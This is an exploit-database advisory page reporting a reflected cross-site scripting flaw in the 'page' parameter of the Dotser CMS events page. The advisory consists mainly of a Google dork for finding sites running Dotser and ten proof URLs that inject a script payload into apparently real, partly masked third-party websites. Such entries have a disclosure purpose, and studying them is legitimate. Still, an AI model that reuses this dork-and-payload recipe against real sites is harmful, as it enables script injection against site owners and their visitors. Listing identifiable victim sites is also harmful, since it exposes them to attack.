Dotser Cross site scripting vulnerability

2013.09.05
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#************************************************************** # [+] Exploit Title : Dotser Cross site scripting vulnerability # # [+] Software link : http://www.dotser.ie # # [+] Exploit Author : Ashiyane Digital Security Team # # [+] Tested on: Windows 7 , Linux # # [+] Google Dork : intext:"Powered by Dotser" # # [+] Date: 2013/09/04 # -------------------------------------------------------------------- # [+] Exploit : Cross site scripting # # [+] Location : [Target]/events/?page=[xss] # #------- # Proof: #------- # # http://www.aXool.com/events/?page="/><script>alert(1);</script> # # http://www.bXa.ie/events/?page="/><script>alert(1);</script> # # http://www.achill-fXchool.com/events/?page="/><script>alert(1);</script> # # http://www.heXorks.ie/events/?page="/><script>alert(1);</script> # # http://www.justfXts.org/events/?page="/><script>alert(1);</script> # # http://tullaXhow.com/events/?page="/><script>alert(1);</script> # # http://www.midlaXland.ie/events/?page="/><script>alert(1);</script> # # http://www.seXwhouse.com/events/?page="/><script>alert(1);</script> # # http://www.niXX.ie/events/?page="/><script>alert(1);</script> # # http://www.sapCXs.org/events/?page="/><script>alert(1);</script> # # ###################### discovered by : ACC3SS ######################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top